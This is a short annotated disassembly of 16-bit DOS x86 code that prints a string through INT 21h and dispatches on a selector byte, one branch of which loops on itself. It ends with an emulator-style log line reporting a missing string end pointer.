0x12c43: mov dx, si
0x12c45: mov ah, 9  ; INT 21h AH=09h, Display string at DS:DX ('$'-terminated)
0x12c47: int 0x21
0x12c49: cmp ch, 0  ; dispatch on the selector byte
0x12c4c: je 0x12c77  ; 0 -> 0x12c77 (outside this window)
0x12c4e: cmp ch, 1
0x12c51: je 0x12c51  ; 1 -> the branch targets itself, so execution spins here
0x12c53: cmp ch, 2  ; further cases continue past this window
2018-12-25T12:22:05.878525102Z 9 PC: 12c49 | Display string (Could not find end pointer)